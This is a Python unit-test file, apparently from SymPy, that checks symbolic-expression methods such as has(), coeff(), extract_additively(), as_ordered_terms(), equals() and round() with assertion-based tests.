A, B, C = symbols('A,B,C', commutative=False)
f = x*gamma(x)*sin(x)*exp(x*y)*A*B*C*cos(x*A*B)
assert f.has(x)
assert f.has(x*y)
assert f.has(x*sin(x))
assert not f.has(x*sin(y))
assert f.has(x*A)
assert f.has(x*A*B)
assert not f.has(x*A*C)
assert f.has(x*A*B*C)
assert not f.has(x*A*C*B)
assert f.has(x*sin(x)*A*B*C)
assert not f.has(x*sin(x)*A*C*B)
assert not f.has(x*sin(y)*A*B*C)
assert f.has(x*gamma(x))
assert not f.has(x + sin(x))
assert (x & y & z).has(x & z)
def test_has_integrals():
f = Integral(x**2 + sin(x*y*z), (x, 0, x + y + z))
assert f.has(x + y)
assert f.has(x + z)
assert f.has(y + z)
assert f.has(x*y)
assert f.has(x*z)
assert f.has(y*z)
assert not f.has(2*x + y)
assert not f.has(2*x*y)
def test_has_tuple():
f = Function('f')
g = Function('g')
h = Function('h')
assert Tuple(x, y).has(x)
assert not Tuple(x, y).has(z)
assert Tuple(f(x), g(x)).has(x)
assert not Tuple(f(x), g(x)).has(y)
assert Tuple(f(x), g(x)).has(f)
assert Tuple(f(x), g(x)).has(f(x))
assert not Tuple(f, g).has(x)
assert Tuple(f, g).has(f)
assert not Tuple(f, g).has(h)
assert Tuple(True).has(True) is True # .has(1) will also be True
def test_has_units():
from sympy.physics.units import m, s
assert (x*m/s).has(x)
assert (x*m/s).has(y, z) is False
def test_has_polys():
poly = Poly(x**2 + x*y*sin(z), x, y, t)
assert poly.has(x)
assert poly.has(x, y, z)
assert poly.has(x, y, z, t)
def test_has_physics():
assert FockState((x, y)).has(x)
def test_as_poly_as_expr():
f = x**2 + 2*x*y
assert f.as_poly().as_expr() == f
assert f.as_poly(x, y).as_expr() == f
assert (f + sin(x)).as_poly(x, y) is None
p = Poly(f, x, y)
assert p.as_poly() == p
def test_nonzero():
assert bool(S.Zero) is False
assert bool(S.One) is True
assert bool(x) is True
assert bool(x + y) is True
assert bool(x - x) is False
assert bool(x*y) is True
assert bool(x*1) is True
assert bool(x*0) is False
def test_is_number():
assert Float(3.14).is_number is True
assert Integer(737).is_number is True
assert Rational(3, 2).is_number is True
assert Rational(8).is_number is True
assert x.is_number is False
assert (2*x).is_number is False
assert (x + y).is_number is False
assert log(2).is_number is True
assert log(x).is_number is False
assert (2 + log(2)).is_number is True
assert (8 + log(2)).is_number is True
assert (2 + log(x)).is_number is False
assert (8 + log(2) + x).is_number is False
assert (1 + x**2/x - x).is_number is True
assert Tuple(Integer(1)).is_number is False
assert Add(2, x).is_number is False
assert Mul(3, 4).is_number is True
assert Pow(log(2), 2).is_number is True
assert oo.is_number is True
g = WildFunction('g')
assert g.is_number is False
assert (2*g).is_number is False
assert (x**2).subs(x, 3).is_number is True
# test extensibility of .is_number
# on subinstances of Basic
class A(Basic):
pass
a = A()
assert a.is_number is False
def test_as_coeff_add():
assert S(2).as_coeff_add() == (2, ())
assert S(3.0).as_coeff_add() == (0, (S(3.0),))
assert S(-3.0).as_coeff_add() == (0, (S(-3.0),))
assert x.as_coeff_add() == (0, (x,))
assert (x - 1).as_coeff_add() == (-1, (x,))
assert (x + 1).as_coeff_add() == (1, (x,))
assert (x + 2).as_coeff_add() == (2, (x,))
assert (x + y).as_coeff_add(y) == (x, (y,))
assert (3*x).as_coeff_add(y) == (3*x, ())
# don't do expansion
e = (x + y)**2
assert e.as_coeff_add(y) == (0, (e,))
def test_as_coeff_mul():
assert S(2).as_coeff_mul() == (2, ())
assert S(3.0).as_coeff_mul() == (1, (S(3.0),))
assert S(-3.0).as_coeff_mul() == (-1, (S(3.0),))
assert x.as_coeff_mul() == (1, (x,))
assert (-x).as_coeff_mul() == (-1, (x,))
assert (2*x).as_coeff_mul() == (2, (x,))
assert (x*y).as_coeff_mul(y) == (x, (y,))
assert (3 + x).as_coeff_mul(y) == (3 + x, ())
# don't do expansion
e = exp(x + y)
assert e.as_coeff_mul(y) == (1, (e,))
e = 2**(x + y)
assert e.as_coeff_mul(y) == (1, (e,))
def test_as_coeff_exponent():
assert (3*x**4).as_coeff_exponent(x) == (3, 4)
assert (2*x**3).as_coeff_exponent(x) == (2, 3)
assert (4*x**2).as_coeff_exponent(x) == (4, 2)
assert (6*x**1).as_coeff_exponent(x) == (6, 1)
assert (3*x**0).as_coeff_exponent(x) == (3, 0)
assert (2*x**0).as_coeff_exponent(x) == (2, 0)
assert (1*x**0).as_coeff_exponent(x) == (1, 0)
assert (0*x**0).as_coeff_exponent(x) == (0, 0)
assert (-1*x**0).as_coeff_exponent(x) == (-1, 0)
assert (-2*x**0).as_coeff_exponent(x) == (-2, 0)
assert (2*x**3 + pi*x**3).as_coeff_exponent(x) == (2 + pi, 3)
assert (x*log(2)/(2*x + pi*x)).as_coeff_exponent(x) == \
(log(2)/(2 + pi), 0)
# 1685
D = Derivative
f = Function('f')
fx = D(f(x), x)
assert fx.as_coeff_exponent(f(x)) == (fx, 0)
def test_extractions():
assert ((x*y)**3).extract_multiplicatively(x**2 * y) == x*y**2
assert ((x*y)**3).extract_multiplicatively(x**4 * y) is None
assert (2*x).extract_multiplicatively(2) == x
assert (2*x).extract_multiplicatively(3) is None
assert (2*x).extract_multiplicatively(-1) is None
assert (Rational(1, 2)*x).extract_multiplicatively(3) == x/6
assert (sqrt(x)).extract_multiplicatively(x) is None
assert (sqrt(x)).extract_multiplicatively(1/x) is None
assert ((x*y)**3).extract_additively(1) is None
assert (x + 1).extract_additively(x) == 1
assert (x + 1).extract_additively(2*x) is None
assert (x + 1).extract_additively(-x) is None
assert (-x + 1).extract_additively(2*x) is None
assert (2*x + 3).extract_additively(x) == x + 3
assert (2*x + 3).extract_additively(2) == 2*x + 1
assert (2*x + 3).extract_additively(3) == 2*x
assert (2*x + 3).extract_additively(-2) is None
assert (2*x + 3).extract_additively(3*x) is None
assert (2*x + 3).extract_additively(2*x) == 3
assert x.extract_additively(0) == x
assert S(2).extract_additively(x) is None
assert S(2.).extract_additively(2) == S.Zero
assert S(2*x + 3).extract_additively(x + 1) == x + 2
assert S(2*x + 3).extract_additively(y + 1) is None
assert S(2*x - 3).extract_additively(x + 1) is None
assert S(2*x - 3).extract_additively(y + z) is None
assert ((a + 1)*x*4 + y).extract_additively(x).expand() == \
4*a*x + 3*x + y
assert ((a + 1)*x*4 + 3*y).extract_additively(x + 2*y).expand() == \
4*a*x + 3*x + y
assert (y*(x + 1)).extract_additively(x + 1) is None
assert ((y + 1)*(x + 1) + 3).extract_additively(x + 1) == \
y*(x + 1) + 3
assert ((x + y)*(x + 1) + x + y + 3).extract_additively(x + y) == \
x*(x + y) + 3
assert (x + y + 2*((x + y)*(x + 1)) + 3).extract_additively((x + y)*(x + 1)) == \
x + y + (x + 1)*(x + y) + 3
assert ((y + 1)*(x + 2*y + 1) + 3).extract_additively(y + 1) == \
(x + 2*y)*(y + 1) + 3
n = Symbol("n", integer=True)
assert (Integer(-3)).could_extract_minus_sign() is True
assert (-n*x + x).could_extract_minus_sign() != \
(n*x - x).could_extract_minus_sign()
assert (x - y).could_extract_minus_sign() != \
(-x + y).could_extract_minus_sign()
assert (1 - x - y).could_extract_minus_sign() is True
assert (1 - x + y).could_extract_minus_sign() is False
assert ((-x - x*y)/y).could_extract_minus_sign() is True
assert (-(x + x*y)/y).could_extract_minus_sign() is True
assert ((x + x*y)/(-y)).could_extract_minus_sign() is True
assert ((x + x*y)/y).could_extract_minus_sign() is False
assert (x*(-x - x**3)).could_extract_minus_sign() is True
assert ((-x - y)/(x + y)).could_extract_minus_sign() is True
# The results of each of these will vary on different machines, e.g.
# the first one might be False and the other (then) is true or vice versa,
# so both are included.
assert ((-x - y)/(x - y)).could_extract_minus_sign() is False or \
((-x - y)/(y - x)).could_extract_minus_sign() is False
assert (x - y).could_extract_minus_sign() is False
assert (-x + y).could_extract_minus_sign() is True
def test_coeff():
assert (x + 1).coeff(x + 1) == 1
assert (3*x).coeff(0) == 0
assert (z*(1 + x)*x**2).coeff(1 + x) == z*x**2
assert (1 + 2*x*x**(1 + x)).coeff(x*x**(1 + x)) == 2
assert (1 + 2*x**(y + z)).coeff(x**(y + z)) == 2
assert (3 + 2*x + 4*x**2).coeff(1) == 0
assert (3 + 2*x + 4*x**2).coeff(-1) == 0
assert (3 + 2*x + 4*x**2).coeff(x) == 2
assert (3 + 2*x + 4*x**2).coeff(x**2) == 4
assert (3 + 2*x + 4*x**2).coeff(x**3) == 0
assert (-x/8 + x*y).coeff(x) == -S(1)/8 + y
assert (-x/8 + x*y).coeff(-x) == S(1)/8
assert (4*x).coeff(2*x) == 0
assert (2*x).coeff(2*x) == 1
assert (-oo*x).coeff(x*oo) == -1
n1, n2 = symbols('n1 n2', commutative=False)
assert (n1*n2).coeff(n1) == 1
assert (n1*n2).coeff(n2) == n1
assert (n1*n2 + x*n1).coeff(n1) == 1 # 1*n1*(n2+x)
assert (n2*n1 + x*n1).coeff(n1) == n2 + x
assert (n2*n1 + x*n1**2).coeff(n1) == n2
assert (n1**x).coeff(n1) == 0
assert (n1*n2 + n2*n1).coeff(n1) == 0
assert (2*(n1 + n2)*n2).coeff(n1 + n2, right=1) == n2
assert (2*(n1 + n2)*n2).coeff(n1 + n2, right=0) == 2
f = Function('f')
assert (2*f(x) + 3*f(x).diff(x)).coeff(f(x)) == 2
expr = z*(x + y)**2
expr2 = z*(x + y)**2 + z*(2*x + 2*y)**2
assert expr.coeff(z) == (x + y)**2
assert expr.coeff(x + y) == 0
assert expr2.coeff(z) == (x + y)**2 + (2*x + 2*y)**2
assert (x + y + 3*z).coeff(1) == x + y
assert (-x + 2*y).coeff(-1) == x
assert (x - 2*y).coeff(-1) == 2*y
assert (3 + 2*x + 4*x**2).coeff(1) == 0
assert (-x - 2*y).coeff(2) == -y
assert (x + sqrt(2)*x).coeff(sqrt(2)) == x
assert (3 + 2*x + 4*x**2).coeff(x) == 2
assert (3 + 2*x + 4*x**2).coeff(x**2) == 4
assert (3 + 2*x + 4*x**2).coeff(x**3) == 0
assert (z*(x + y)**2).coeff((x + y)**2) == z
assert (z*(x + y)**2).coeff(x + y) == 0
assert (2 + 2*x + (x + 1)*y).coeff(x + 1) == y
assert (x + 2*y + 3).coeff(1) == x
assert (x + 2*y + 3).coeff(x, 0) == 2*y + 3
assert (x**2 + 2*y + 3*x).coeff(x**2, 0) == 2*y + 3*x
assert x.coeff(0, 0) == 0
assert x.coeff(x, 0) == 0
n, m, o, l = symbols('n m o l', commutative=False)
assert n.coeff(n) == 1
assert y.coeff(n) == 0
assert (3*n).coeff(n) == 3
assert (2 + n).coeff(x*m) == 0
assert (2*x*n*m).coeff(x) == 2*n*m
assert (2 + n).coeff(x*m*n + y) == 0
assert (2*x*n*m).coeff(3*n) == 0
assert (n*m + m*n*m).coeff(n) == 1 + m
assert (n*m + m*n*m).coeff(n, right=True) == m # = (1 + m)*n*m
assert (n*m + m*n).coeff(n) == 0
assert (n*m + o*m*n).coeff(m*n) == o
assert (n*m + o*m*n).coeff(m*n, right=1) == 1
assert (n*m + n*m*n).coeff(n*m, right=1) == 1 + n # = n*m*(n + 1)
def test_coeff2():
r, kappa = symbols('r, kappa')
psi = Function("psi")
g = 1/r**2 * (2*r*psi(r).diff(r, 1) + r**2 * psi(r).diff(r, 2))
g = g.expand()
assert g.coeff((psi(r).diff(r))) == 2/r
def test_coeff2_0():
r, kappa = symbols('r, kappa')
psi = Function("psi")
g = 1/r**2 * (2*r*psi(r).diff(r, 1) + r**2 * psi(r).diff(r, 2))
g = g.expand()
assert g.coeff(psi(r).diff(r, 2)) == 1
def test_coeff_expand():
expr = z*(x + y)**2
expr2 = z*(x + y)**2 + z*(2*x + 2*y)**2
assert expr.coeff(z) == (x + y)**2
assert expr2.coeff(z) == (x + y)**2 + (2*x + 2*y)**2
def test_integrate():
assert x.integrate(x) == x**2/2
assert x.integrate((x, 0, 1)) == S(1)/2
def test_as_base_exp():
assert x.as_base_exp() == (x, S.One)
assert (x*y*z).as_base_exp() == (x*y*z, S.One)
assert (x + y + z).as_base_exp() == (x + y + z, S.One)
assert ((x + y)**z).as_base_exp() == (x + y, z)
def test_issue1864():
assert hasattr(Mul(x, y), "is_commutative")
assert hasattr(Mul(x, y, evaluate=False), "is_commutative")
assert hasattr(Pow(x, y), "is_commutative")
assert hasattr(Pow(x, y, evaluate=False), "is_commutative")
expr = Mul(Pow(2, 2, evaluate=False), 3, evaluate=False) + 1
assert hasattr(expr, "is_commutative")
def test_action_verbs():
assert nsimplify((1/(exp(3*pi*x/5) + 1))) == \
(1/(exp(3*pi*x/5) + 1)).nsimplify()
assert ratsimp(1/x + 1/y) == (1/x + 1/y).ratsimp()
assert trigsimp(log(x), deep=True) == (log(x)).trigsimp(deep=True)
assert radsimp(1/(2 + sqrt(2))) == (1/(2 + sqrt(2))).radsimp()
assert powsimp(x**y*x**z*y**z, combine='all') == \
(x**y*x**z*y**z).powsimp(combine='all')
assert simplify(x**y*x**z*y**z) == (x**y*x**z*y**z).simplify()
assert together(1/x + 1/y) == (1/x + 1/y).together()
# Not tested because it's deprecated
#assert separate((x*(y*z)**3)**2) == ((x*(y*z)**3)**2).separate()
assert collect(a*x**2 + b*x**2 + a*x - b*x + c, x) == \
(a*x**2 + b*x**2 + a*x - b*x + c).collect(x)
assert apart(y/(y + 2)/(y + 1), y) == (y/(y + 2)/(y + 1)).apart(y)
assert combsimp(y/(x + 2)/(x + 1)) == (y/(x + 2)/(x + 1)).combsimp()
assert factor(x**2 + 5*x + 6) == (x**2 + 5*x + 6).factor()
assert refine(sqrt(x**2)) == sqrt(x**2).refine()
assert cancel((x**2 + 5*x + 6)/(x + 2)) == ((x**2 + 5*x + 6)/(x + 2)).cancel()
def test_as_powers_dict():
assert x.as_powers_dict() == {x: 1}
assert (x**y*z).as_powers_dict() == {x: y, z: 1}
assert Mul(2, 2, evaluate=False).as_powers_dict() == {S(2): S(2)}
assert (x*y).as_powers_dict()[z] == 0
assert (x + y).as_powers_dict()[z] == 0
def test_as_coefficients_dict():
check = [S(1), x, y, x*y, 1]
assert [Add(3*x, 2*x, y, 3).as_coefficients_dict()[i] for i in check] == \
[3, 5, 1, 0, 0]
assert [(3*x*y).as_coefficients_dict()[i] for i in check] == \
[0, 0, 0, 3, 0]
assert (3.0*x*y).as_coefficients_dict()[3.0*x*y] == 1
def test_args_cnc():
A = symbols('A', commutative=False)
assert (x + A).args_cnc() == \
[[], [x + A]]
assert (x + a).args_cnc() == \
[[a + x], []]
assert (x*a).args_cnc() == \
[[a, x], []]
assert (x*y*A*(A + 1)).args_cnc(cset=True) == \
[set([x, y]), [A, 1 + A]]
assert Mul(x, x, evaluate=False).args_cnc(cset=True, warn=False) == \
[set([x]), []]
assert Mul(x, x**2, evaluate=False).args_cnc(cset=True, warn=False) == \
[set([x, x**2]), []]
raises(ValueError, lambda: Mul(x, x, evaluate=False).args_cnc(cset=True))
assert Mul(x, y, x, evaluate=False).args_cnc() == \
[[x, y, x], []]
# always split -1 from leading number
assert (-1.*x).args_cnc() == [[-1, 1.0, x], []]
def test_new_rawargs():
n = Symbol('n', commutative=False)
a = x + n
assert a.is_commutative is False
assert a._new_rawargs(x).is_commutative
assert a._new_rawargs(x, y).is_commutative
assert a._new_rawargs(x, n).is_commutative is False
assert a._new_rawargs(x, y, n).is_commutative is False
m = x*n
assert m.is_commutative is False
assert m._new_rawargs(x).is_commutative
assert m._new_rawargs(n).is_commutative is False
assert m._new_rawargs(x, y).is_commutative
assert m._new_rawargs(x, n).is_commutative is False
assert m._new_rawargs(x, y, n).is_commutative is False
assert m._new_rawargs(x, n, reeval=False).is_commutative is False
assert m._new_rawargs(S.One) is S.One
def test_2127():
assert Add(evaluate=False) == 0
assert Mul(evaluate=False) == 1
assert Mul(x + y, evaluate=False).is_Add
def test_free_symbols():
# free_symbols should return the free symbols of an object
assert S(1).free_symbols == set()
assert (x).free_symbols == set([x])
assert Integral(x, (x, 1, y)).free_symbols == set([y])
assert (-Integral(x, (x, 1, y))).free_symbols == set([y])
assert meter.free_symbols == set()
assert (meter**x).free_symbols == set([x])
def test_issue2201():
x = Symbol('x', commutative=False)
assert x*sqrt(2)/sqrt(6) == x*sqrt(3)/3
def test_as_coeff_Mul():
assert Integer(3).as_coeff_Mul() == (Integer(3), Integer(1))
assert Rational(3, 4).as_coeff_Mul() == (Rational(3, 4), Integer(1))
assert Float(5.0).as_coeff_Mul() == (Float(5.0), Integer(1))
assert (Integer(3)*x).as_coeff_Mul() == (Integer(3), x)
assert (Rational(3, 4)*x).as_coeff_Mul() == (Rational(3, 4), x)
assert (Float(5.0)*x).as_coeff_Mul() == (Float(5.0), x)
assert (Integer(3)*x*y).as_coeff_Mul() == (Integer(3), x*y)
assert (Rational(3, 4)*x*y).as_coeff_Mul() == (Rational(3, 4), x*y)
assert (Float(5.0)*x*y).as_coeff_Mul() == (Float(5.0), x*y)
assert (x).as_coeff_Mul() == (S.One, x)
assert (x*y).as_coeff_Mul() == (S.One, x*y)
def test_as_coeff_Add():
assert Integer(3).as_coeff_Add() == (Integer(3), Integer(0))
assert Rational(3, 4).as_coeff_Add() == (Rational(3, 4), Integer(0))
assert Float(5.0).as_coeff_Add() == (Float(5.0), Integer(0))
assert (Integer(3) + x).as_coeff_Add() == (Integer(3), x)
assert (Rational(3, 4) + x).as_coeff_Add() == (Rational(3, 4), x)
assert (Float(5.0) + x).as_coeff_Add() == (Float(5.0), x)
assert (Integer(3) + x + y).as_coeff_Add() == (Integer(3), x + y)
assert (Rational(3, 4) + x + y).as_coeff_Add() == (Rational(3, 4), x + y)
assert (Float(5.0) + x + y).as_coeff_Add() == (Float(5.0), x + y)
assert (x).as_coeff_Add() == (S.Zero, x)
assert (x*y).as_coeff_Add() == (S.Zero, x*y)
def test_expr_sorting():
f, g = symbols('f,g', cls=Function)
exprs = [1/x**2, 1/x, sqrt(sqrt(x)), sqrt(x), x, sqrt(x)**3, x**2]
assert sorted(exprs, key=default_sort_key) == exprs
exprs = [x, 2*x, 2*x**2, 2*x**3, x**n, 2*x**n, sin(x), sin(x)**n,
sin(x**2), cos(x), cos(x**2), tan(x)]
assert sorted(exprs, key=default_sort_key) == exprs
exprs = [x + 1, x**2 + x + 1, x**3 + x**2 + x + 1]
assert sorted(exprs, key=default_sort_key) == exprs
exprs = [S(4), x - 3*I/2, x + 3*I/2, x - 4*I + 1, x + 4*I + 1]
assert sorted(exprs, key=default_sort_key) == exprs
exprs = [f(1), f(2), f(3), f(1, 2, 3), g(1), g(2), g(3), g(1, 2, 3)]
assert sorted(exprs, key=default_sort_key) == exprs
exprs = [f(x), g(x), exp(x), sin(x), cos(x), factorial(x)]
assert sorted(exprs, key=default_sort_key) == exprs
exprs = [Tuple(x, y), Tuple(x, z), Tuple(x, y, z)]
assert sorted(exprs, key=default_sort_key) == exprs
exprs = [[3], [1, 2]]
assert sorted(exprs, key=default_sort_key) == exprs
exprs = [[1, 2], [2, 3]]
assert sorted(exprs, key=default_sort_key) == exprs
exprs = [[1, 2], [1, 2, 3]]
assert sorted(exprs, key=default_sort_key) == exprs
exprs = [{x: -y}, {x: y}]
assert sorted(exprs, key=default_sort_key) == exprs
exprs = [set([1]), set([1, 2])]
assert sorted(exprs, key=default_sort_key) == exprs
def test_as_ordered_factors():
f, g = symbols('f,g', cls=Function)
assert x.as_ordered_factors() == [x]
assert (2*x*x**n*sin(x)*cos(x)).as_ordered_factors() \
== [Integer(2), x, x**n, sin(x), cos(x)]
args = [f(1), f(2), f(3), f(1, 2, 3), g(1), g(2), g(3), g(1, 2, 3)]
expr = Mul(*args)
assert expr.as_ordered_factors() == args
A, B = symbols('A,B', commutative=False)
assert (A*B).as_ordered_factors() == [A, B]
assert (B*A).as_ordered_factors() == [B, A]
def test_as_ordered_terms():
f, g = symbols('f,g', cls=Function)
assert x.as_ordered_terms() == [x]
assert (sin(x)**2*cos(x) + sin(x)*cos(x)**2 + 1).as_ordered_terms() \
== [sin(x)**2*cos(x), sin(x)*cos(x)**2, 1]
args = [f(1), f(2), f(3), f(1, 2, 3), g(1), g(2), g(3), g(1, 2, 3)]
expr = Add(*args)
assert expr.as_ordered_terms() == args
assert (1 + 4*sqrt(3)*pi*x).as_ordered_terms() == [4*pi*x*sqrt(3), 1]
assert ( 2 + 3*I).as_ordered_terms() == [2, 3*I]
assert (-2 + 3*I).as_ordered_terms() == [-2, 3*I]
assert ( 2 - 3*I).as_ordered_terms() == [2, -3*I]
assert (-2 - 3*I).as_ordered_terms() == [-2, -3*I]
assert ( 4 + 3*I).as_ordered_terms() == [4, 3*I]
assert (-4 + 3*I).as_ordered_terms() == [-4, 3*I]
assert ( 4 - 3*I).as_ordered_terms() == [4, -3*I]
assert (-4 - 3*I).as_ordered_terms() == [-4, -3*I]
f = x**2*y**2 + x*y**4 + y + 2
assert f.as_ordered_terms(order="lex") == [x**2*y**2, x*y**4, y, 2]
assert f.as_ordered_terms(order="grlex") == [x*y**4, x**2*y**2, y, 2]
assert f.as_ordered_terms(order="rev-lex") == [2, y, x*y**4, x**2*y**2]
assert f.as_ordered_terms(order="rev-grlex") == [2, y, x**2*y**2, x*y**4]
def test_sort_key_atomic_expr():
from sympy.physics.units import m, s
assert sorted([-m, s], key=lambda arg: arg.sort_key()) == [-m, s]
def test_issue_1100():
# first subs and limit gives NaN
a = x/y
assert a._eval_interval(x, 0, oo)._eval_interval(y, oo, 0) is S.NaN
# second subs and limit gives NaN
assert a._eval_interval(x, 0, oo)._eval_interval(y, 0, oo) is S.NaN
# difference gives S.NaN
a = x - y
assert a._eval_interval(x, 1, oo)._eval_interval(y, oo, 1) is S.NaN
raises(ValueError, lambda: x._eval_interval(x, None, None))
def test_primitive():
assert (3*(x + 1)**2).primitive() == (3, (x + 1)**2)
assert (6*x + 2).primitive() == (2, 3*x + 1)
assert (x/2 + 3).primitive() == (S(1)/2, x + 6)
eq = (6*x + 2)*(x/2 + 3)
assert eq.primitive()[0] == 1
eq = (2 + 2*x)**2
assert eq.primitive()[0] == 1
assert (4.0*x).primitive() == (1, 4.0*x)
assert (4.0*x + y/2).primitive() == (S.Half, 8.0*x + y)
assert (-2*x).primitive() == (2, -x)
assert Add(5*z/7, 0.5*x, 3*y/2, evaluate=False).primitive() == \
(S(1)/14, 7.0*x + 21*y + 10*z)
for i in [S.Infinity, S.NegativeInfinity, S.ComplexInfinity]:
assert (i + x/3).primitive() == \
(S(1)/3, i + x)
assert (S.Infinity + 2*x/3 + 4*y/7).primitive() == \
(S(1)/21, 14*x + 12*y + oo)
assert S.Zero.primitive() == (S.One, S.Zero)
def test_issue_2744():
a = 1 + x
assert (2*a).extract_multiplicatively(a) == 2
assert (4*a).extract_multiplicatively(2*a) == 2
assert ((3*a)*(2*a)).extract_multiplicatively(a) == 6*a
def test_is_constant():
from sympy.solvers.solvers import checksol
Sum(x, (x, 1, 10)).is_constant() is True
Sum(x, (x, 1, n)).is_constant() is False
Sum(x, (x, 1, n)).is_constant(y) is True
Sum(x, (x, 1, n)).is_constant(n) is False
Sum(x, (x, 1, n)).is_constant(x) is True
eq = a*cos(x)**2 + a*sin(x)**2 - a
eq.is_constant() is True
assert eq.subs({x: pi, a: 2}) == eq.subs({x: pi, a: 3}) == 0
assert x.is_constant() is False
assert x.is_constant(y) is True
assert checksol(x, x, Sum(x, (x, 1, n))) is False
assert checksol(x, x, Sum(x, (x, 1, n))) is False
f = Function('f')
assert checksol(x, x, f(x)) is False
p = symbols('p', positive=True)
assert Pow(x, S(0), evaluate=False).is_constant() is True # == 1
assert Pow(S(0), x, evaluate=False).is_constant() is False # == 0 or 1
assert Pow(S(0), p, evaluate=False).is_constant() is True # == 1
assert (2**x).is_constant() is False
assert Pow(S(2), S(3), evaluate=False).is_constant() is True
z1, z2 = symbols('z1 z2', zero=True)
assert (z1 + 2*z2).is_constant() is True
assert meter.is_constant() is True
assert (3*meter).is_constant() is True
assert (x*meter).is_constant() is False
def test_equals():
assert (-3 - sqrt(5) + (-sqrt(10)/2 - sqrt(2)/2)**2).equals(0)
assert (x**2 - 1).equals((x + 1)*(x - 1))
assert (cos(x)**2 + sin(x)**2).equals(1)
assert (a*cos(x)**2 + a*sin(x)**2).equals(a)
r = sqrt(2)
assert (-1/(r + r*x) + 1/r/(1 + x)).equals(0)
assert factorial(x + 1).equals((x + 1)*factorial(x))
assert sqrt(3).equals(2*sqrt(3)) is False
assert (sqrt(5)*sqrt(3)).equals(sqrt(3)) is False
assert (sqrt(5) + sqrt(3)).equals(0) is False
assert (sqrt(5) + pi).equals(0) is False
assert meter.equals(0) is False
assert (3*meter**2).equals(0) is False
eq = -(-1)**(S(3)/4)*6**(S(1)/4) + (-6)**(S(1)/4)*I
if eq != 0: # if canonicalization makes this zero, skip the test
assert eq.equals(0)
assert sqrt(x).equals(0) is False
# from integrate(x*sqrt(1+2*x), x);
# diff is zero only when assumptions allow
i = 2*sqrt(2)*x**(S(5)/2)*(1 + 1/(2*x))**(S(5)/2)/5 + \
2*sqrt(2)*x**(S(3)/2)*(1 + 1/(2*x))**(S(5)/2)/(-6 - 3/x)
ans = sqrt(2*x + 1)*(6*x**2 + x - 1)/15
diff = i - ans
assert diff.equals(0) is False
assert diff.subs(x, -S.Half/2) == 7*sqrt(2)/120
# there are regions for x for which the expression is True, for
# example, when x < -1/2 or x > 0 the expression is zero
p = Symbol('p', positive=True)
assert diff.subs(x, p).equals(0) is True
assert diff.subs(x, -1).equals(0) is True
# prove via minimal_polynomial or self-consistency
eq = sqrt(1 + sqrt(3)) + sqrt(3 + 3*sqrt(3)) - sqrt(10 + 6*sqrt(3))
assert eq.equals(0)
q = 3**Rational(1, 3) + 3
p = expand(q**3)**Rational(1, 3)
assert (p - q).equals(0)
# issue 3730
# eq = q*x + q/4 + x**4 + x**3 + 2*x**2 - S(1)/3
# z = eq.subs(x, solve(eq, x)[0])
q = symbols('q')
z = (q*(-sqrt(-2*(-(q - S(7)/8)**S(2)/8 - S(2197)/13824)**(S(1)/3) -
S(13)/12)/2 - sqrt((2*q - S(7)/4)/sqrt(-2*(-(q - S(7)/8)**S(2)/8 -
S(2197)/13824)**(S(1)/3) - S(13)/12) + 2*(-(q - S(7)/8)**S(2)/8 -
S(2197)/13824)**(S(1)/3) - S(13)/6)/2 - S(1)/4) + q/4 + (-sqrt(-2*(-(q
- S(7)/8)**S(2)/8 - S(2197)/13824)**(S(1)/3) - S(13)/12)/2 - sqrt((2*q
- S(7)/4)/sqrt(-2*(-(q - S(7)/8)**S(2)/8 - S(2197)/13824)**(S(1)/3) -
S(13)/12) + 2*(-(q - S(7)/8)**S(2)/8 - S(2197)/13824)**(S(1)/3) -
S(13)/6)/2 - S(1)/4)**4 + (-sqrt(-2*(-(q - S(7)/8)**S(2)/8 -
S(2197)/13824)**(S(1)/3) - S(13)/12)/2 - sqrt((2*q -
S(7)/4)/sqrt(-2*(-(q - S(7)/8)**S(2)/8 - S(2197)/13824)**(S(1)/3) -
S(13)/12) + 2*(-(q - S(7)/8)**S(2)/8 - S(2197)/13824)**(S(1)/3) -
S(13)/6)/2 - S(1)/4)**3 + 2*(-sqrt(-2*(-(q - S(7)/8)**S(2)/8 -
S(2197)/13824)**(S(1)/3) - S(13)/12)/2 - sqrt((2*q -
S(7)/4)/sqrt(-2*(-(q - S(7)/8)**S(2)/8 - S(2197)/13824)**(S(1)/3) -
S(13)/12) + 2*(-(q - S(7)/8)**S(2)/8 - S(2197)/13824)**(S(1)/3) -
S(13)/6)/2 - S(1)/4)**2 - S(1)/3)
assert z.equals(0)
def test_random():
from sympy import posify, lucas
assert posify(x)[0]._random() is not None
assert lucas(n)._random(2, -2, 0, -1, 1) is None
def test_round():
from sympy.abc import x
assert Float('0.1249999').round(2) == 0.12
d20 = 12345678901234567890
ans = S(d20).round(2)
assert ans.is_Float and ans == d20
ans = S(d20).round(-2)
assert ans.is_Float and ans == 12345678901234567900
assert S('1/7').round(4) == 0.1429
assert S('.[12345]').round(4) == 0.1235
assert S('.1349').round(2) == 0.13
n = S(12345)
ans = n.round()
assert ans.is_Float
assert ans == n
ans = n.round(1)
assert ans.is_Float
assert ans == n
ans = n.round(4)
assert ans.is_Float
assert ans == n
assert n.round(-1) == 12350
r = n.round(-4)
assert r == 10000
# in fact, it should equal many values since __eq__
# compares at equal precision
assert all(r == i for i in range(9984, 10049))
assert n.round(-5) == 0
assert (pi + sqrt(2)).round(2) == 4.56
assert (10*(pi + sqrt(2))).round(-1) == 50
raises(TypeError, lambda: round(x + 2, 2))
assert S(2.3).round(1) == 2.3
e = S(12.345).round(2)
assert e == round(12.345, 2)
assert type(e) is Float
assert (Float(.3, 3) + 2*pi).round() == 7
assert (Float(.3, 3) + 2*pi*100).round() == 629
assert (Float(.03, 3) + 2*pi/100).round(5) == 0.09283
assert (Float(.03, 3) + 2*pi/100).round(4) == 0.0928
assert (pi + 2*E*I).round() == 3 + 5*I
assert S.Zero.round() == 0
a = (Add(1, Float('1.' + '9'*27, ''), evaluate=0))
assert a.round(10) == Float('3.0000000000', '')
assert a.round(25) == Float('3.0000000000000000000000000', '')
assert a.round(26) == Float('3.00000000000000000000000000', '')
assert a.round(27) == Float('2.999999999999999999999999999', '')
assert a.round(30) == Float('2.999999999999999999999999999', '')
raises(TypeError, lambda: x.round())
# exact magnitude of 10
assert str(S(1).round()) == '1.'
assert str(S(100).round()) == '100.'
# applied to real and imaginary portions
assert (2*pi + E*I).round() == 6 + 3*I
assert (2*pi + I/10).round() == 6
assert (pi/10 + 2*I).round() == 2*I
# the lhs re and im parts are Float with dps of 2
# and those on the right have dps of 15 so they won't compare
# equal unless we use string or compare components (which will
# then coerce the floats to the same precision) or re-create
# the floats
assert str((pi/10 + E*I).round(2)) == '0.31 + 2.72*I'
